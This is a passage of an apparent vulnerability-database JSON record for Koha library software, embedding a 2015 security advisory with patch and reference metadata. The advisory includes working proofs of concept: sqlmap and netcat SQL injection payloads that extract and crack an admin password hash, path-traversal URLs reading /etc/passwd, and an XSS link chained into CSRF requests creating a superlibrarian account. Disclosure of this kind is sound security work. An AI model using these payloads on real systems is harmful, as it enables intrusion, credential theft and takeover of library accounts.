Group\ncontact:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0cst@sba-research.org\n\n\nReferences:\t\thttp://koha-community.org/security-release-koha-3-20-1/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-18-8/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-16-12/\n\n\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u200bhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\n\n===============================================================================================\n\n=========================\n1. Mutiple SQL Injections\n=========================\n\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) \u00a0 +\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n\nVulnerability:\n--------------\nThe url parameter \u0027number\u0027 in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n1. Inspect Koha database schema\n\n\u00a0 \u00a0Have a look at how to query the database for superlibrarian users:\n\u00a0 \u00a0http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians\n\n\u00a0 \u00a0So basically we we need to execute some SQL statement like this:\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\n2. Query the database with sqlmap\n\n\u00a0 \u00a0So let\u0027s fire up sqlmap with the --sql-shell parameter and input the query:\n\n\u00a0 \u00a0root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0_\n\u00a0 \u00a0 ___ ___| |_____ ___ ___ \u00a0{1.0-dev-nongit-20150513}\n\u00a0 \u00a0|_ -| . | | \u00a0 \u00a0 | .\u0027| . |\n\u00a0 \u00a0|___|_ \u00a0|_|_|_|_|__,| \u00a0_|\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0|_| \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |_| \u00a0 http://sqlmap.org\n\n\n\u00a0 \u00a0[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0027s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n\u00a0 \u00a0[*] starting at 09:20:07\n\n\n\u00a0 \u00a0[09:20:07] [INFO] testing connection to the target URL\n\u00a0 \u00a0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n\u00a0 \u00a0---\n\u00a0 \u00a0Parameter: number (GET)\n\u00a0 \u00a0 \u00a0 \u00a0Type: AND/OR time-based blind\n\u00a0 \u00a0 \u00a0 \u00a0Title: MySQL \u003e= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)\n\u00a0 \u00a0 \u00a0 \u00a0Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)\n\u00a0 \u00a0---\n\u00a0 \u00a0[09:20:09] [INFO] testing MySQL\n\u00a0 \u00a0[09:20:09] [INFO] confirming MySQL\n\u00a0 \u00a0[09:20:09] [INFO] the back-end DBMS is MySQL\n\u00a0 \u00a0web server operating system: Linux Debian\n\u00a0 \u00a0web application technology: Apache 2.4.10\n\u00a0 \u00a0back-end DBMS: MySQL \u003e= 5.0.0\n\u00a0 \u00a0[09:20:09] [INFO] calling MySQL shell. To quit type \u0027x\u0027 or \u0027q\u0027 and press ENTER\n\n\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\u00a0 \u00a0[09:20:25] [INFO] fetching SQL SELECT statement query output: \u0027select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1\u0027\n\u00a0 \u00a0[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind\n\u00a0 \u00a0[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\n\u00a0 \u00a0[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors\u00a0\n\u00a0 \u00a0admin\n\u00a0 \u00a0[09:21:46] [INFO] retrieved: $2a$08$taQ\n\u00a0 \u00a0[09:23:33] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:23:33] [WARNING] increasing time delay to 5 seconds\u00a0\n\u00a0 \u00a0afOgEEhU\n\u00a0 \u00a0[09:25:10] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:25:10] [WARNING] increasing time delay to 6 seconds\u00a0\n\u00a0 \u00a0t/gW\n\u00a0 \u00a0[09:26:13] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:26:13] [WARNING] increasing time delay to 7 seconds\u00a0\n\u00a0 \u00a0TOmqnYe1Y6ZNxCENa\n\u00a0 \u00a0[09:29:57] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:29:57] [WARNING] increasing time delay to 8 seconds\u00a0\n\u00a0 \u00a02.ONk2eZhnuEw5z9OjjxS\n\u00a0 \u00a0[09:35:08] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:35:08] [WARNING] increasing time delay to 9 seconds\u00a0\n\n\u00a0 \u00a0select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: \u00a0 \u00a0\n\u00a0 \u00a0\u0027admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\u0027\n\n3. Feed john the ripper and be lucky\n\n\u00a0 \u00a0root@kali:/home/wicked# echo \"$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\" \u003e ./admin-pass\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass\u00a0\n\u00a0 \u00a0Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])\n\u00a0 \u00a0admin \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(?)\n\u00a0 \u00a0guesses: 1 \u00a0time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) \u00a0c/s: 260 \u00a0trying: Smokey - allstate\n\u00a0 \u00a0Use the \"--show\" option to display all of the cracked passwords reliably\n\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass --show\n\u00a0 \u00a0?:admin\n\n\u00a0 \u00a01 password hash cracked, 0 left\n\n4. If the webserver is misconfigured, read \u0026 write access to the filesystem may be possible. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n====================================================================\n1. \"Criteria\" Parameter, Payload: ELT(1=1,\u0027evil\u0027) / ELT(1=2,\u0027evil\u0027)\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=2,\u0027evil\u0027)\" | nc testbox 9002\n\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=1,\u0027evil\u0027)\" | nc testbox 9002\n\n====================================================================\n2. \"Filter\" Parameter, Payload: P_COM\u0027+AND+\u0027a\u0027=\u0027a / P_COM\u0027+AND+\u0027a\u0027=\u0027b\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027a\" | nc testbox 9002\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027b\" | nc testbox 9002\n\n====================================================================\n\nYou will notice different output in every second request, demonstrating the evaluation of the payload. \n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n3. Path Traversal (CVE-2015-4633)\n=================================\n\nVulnerability\n-------------\nThe \"template_path\" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal. \n\nReferences\n----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nThe following input is used to print out /etc/passwd:\n\n/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n4. The site also lacks in the implementation of challenge tokens that prevent cross-site\u00a0\nforgery (XSRF) attacks. \u00a0\n\nThe attack can be performed by:\n\n- through a compromised user account. \u00a0\n\nReferences\n----------------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\n# ################################################################################################## #\n# PoC / Attack Scenario: \t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nAlice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:\n\n--\u003e http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=Malicious+Input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0\n\nBob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens\u00a0\n\n--\u003e http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl\n\nthe malcious code get\u0027s executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:\n\nCreate new user:\n-----------------------\n\n--\u003e http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026B_address=\u0026B_address2=\u0026B_city=\u0026B_state=\u0026B_zipcode=\u0026B_country=\u0026B_phone=\u0026B_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress\u0026category_type=A\u0026updtype=I\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2F06%2F2000\u0026address=fictional\u0026select_city=%7C%7C%7C\u0026cardnumber=9182734629182364\u0026branchcode=MAURES\u0026categorycode=P_COM\u0026dateenrolled=24%2F06%2F2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=PROFESSION\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=Save\u0026setting_extended_patron_attributes=1\n\nGive the new user superlibririan permission:\n----------------------------------------------------------\n\n--\u003e http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian\n\nThe attacker can now log as superlibrarian. \n\nSide Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. \nAlice needs to have access to the OPAC interface and to have permissions to create public lists. \n\n# ################################################################################################## #\n# PoC / Attack Scenario End\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n\n\n\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-4631"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008219"
},
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "132458"
}
],
"trust": 5.58
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "75426",
"trust": 3.9
},
{
"db": "NVD",
"id": "CVE-2015-4631",
"trust": 3.8
},
{
"db": "PACKETSTORM",
"id": "132458",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-201512-696",
"trust": 1.6
},
{
"db": "EXPLOIT-DB",
"id": "37389",
"trust": 1.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05197",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2015-05198",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2015-05199",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2015-05200",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2015-05201",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008219",
"trust": 0.8
},
{
"db": "IVD",
"id": "70A561B4-1E6E-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "72631F14-1E6E-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "747C9C94-1E6E-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "182E31FA-1E6E-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "1AD25DDC-1E6E-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008219"
},
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-696"
},
{
"db": "NVD",
"id": "CVE-2015-4631"
}
]
},
"id": "VAR-201810-0024",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
}
],
"trust": 4.5804196
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 4.0
}
],
"sources": [
{
"db": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
}
]
},
"last_update_date": "2024-11-23T21:52:48.282000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Bug 14416",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
},
{
"title": "Bug 14418",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
},
{
"title": "Bug 14423",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"title": "Security Release - Koha 3.20.1",
"trust": 0.8,
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"title": "Koha 3.14.16 released",
"trust": 0.8,
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"title": "Security Release - Koha 3.16.12",
"trust": 0.8,
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"title": "Security Release - Koha 3.18.8",
"trust": 0.8,
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"title": "Koha directory traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62257"
},
{
"title": "Patch for Koha cross-site request forgery vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62260"
},
{
"title": "Koha HTML Injection Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62258"
},
{
"title": "Patch for Koha Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62259"
},
{
"title": "Patch for Koha SQL Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62255"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008219"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008219"
},
{
"db": "NVD",
"id": "CVE-2015-4631"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.6,
"url": "http://www.securityfocus.com/bid/75426"
},
{
"trust": 2.0,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
},
{
"trust": 2.0,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"trust": 2.0,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
},
{
"trust": 1.7,
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"trust": 1.7,
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"trust": 1.7,
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"trust": 1.6,
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"trust": 1.6,
"url": "https://packetstormsecurity.com/files/132458/koha-ils-3.20.x-csrf-xss-traversal-sql-injection.html"
},
{
"trust": 1.6,
"url": "https://seclists.org/fulldisclosure/2015/jun/80"
},
{
"trust": 1.6,
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"trust": 1.6,
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4631"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4631"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
},
{
"trust": 0.3,
"url": "http://koha-community.org/"
},
{
"trust": 0.1,
"url": "http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10"
},
{
"trust": 0.1,
"url": "http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026b_address=\u0026b_address2=\u0026b_city=\u0026b_state=\u0026b_zipcode=\u0026b_country=\u0026b_phone=\u0026b_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026borrowermandatoryfield=surname%7cdateofbirth%7ccardnumber%7caddress\u0026category_type=a\u0026updtype=i\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2f06%2f2000\u0026address=fictional\u0026select_city=%7c%7c%7c\u0026cardnumber=9182734629182364\u0026branchcode=maures\u0026categorycode=p_com\u0026dateenrolled=24%2f06%2f2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=profession\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=save\u0026setting_extended_patron_attributes=1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4632"
},
{
"trust": 0.1,
"url": "http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian"
},
{
"trust": 0.1,
"url": "http://wiki.koha-community.org/wiki/sql_reports_library#superlibrarians"
},
{
"trust": 0.1,
"url": "http://www.koha-community.org/"
},
{
"trust": 0.1,
"url": "http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl"
},
{
"trust": 0.1,
"url": "http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=malicious+input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4633"
},
{
"trust": 0.1,
"url": "http://sqlmap.org"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008219"
},
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-696"
},
{
"db": "NVD",
"id": "CVE-2015-4631"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
